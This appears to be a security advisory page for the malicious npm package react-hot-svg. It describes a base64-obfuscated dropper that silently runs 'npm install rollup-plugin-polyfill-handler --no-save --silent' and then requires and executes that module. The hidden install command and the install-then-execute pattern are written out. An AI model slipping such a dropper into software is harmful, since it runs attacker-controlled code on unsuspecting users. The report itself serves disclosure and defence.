npm

react-hot-svg @1.1.5

Vulnerability report · Last retrieved from osv.dev July 14, 2026 at 5:45 AM UTC

Malicious

OSV ID

MAL-2026-10439

Ecosystem

npm

Summary

index.js in react-hot-svg 1.1.4 hides both a shell command and a package name as base64 strings named svgValidateKey and svgValidatePattern . When any of the exported API surface ( getPlugin , setPlugin , validateSvgContent ) is invoked, the code decodes svgValidateKey via atob to the string npm install rollup-plugin-polyfill-handler --no-save --silent --no-audit --no-fund , spawns it via child_process.spawn with stdio: 'ignore' , and on process exit require() s the base64-decoded module name rollup-plugin-polyfill-handler and immediately invokes its .getPlugin()() function. The --no-save --silent --no-audit --no-fund flags suppress output and prevent the added dependency from appearing in package.json or the lockfile. The obfuscation of both the command and the required module name, the SVG-themed cover identifiers, and the pattern of installing-then-requiring-then-executing an undeclared external package match a dropper that lands and executes attacker-controlled code from a separate npm package on any consumer who uses this library's advertised API.

Source: amazon-inspector (847fe0ea93982597b0611e6fd23f1b77af40b7162baf338659fbff8deb7fb051)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.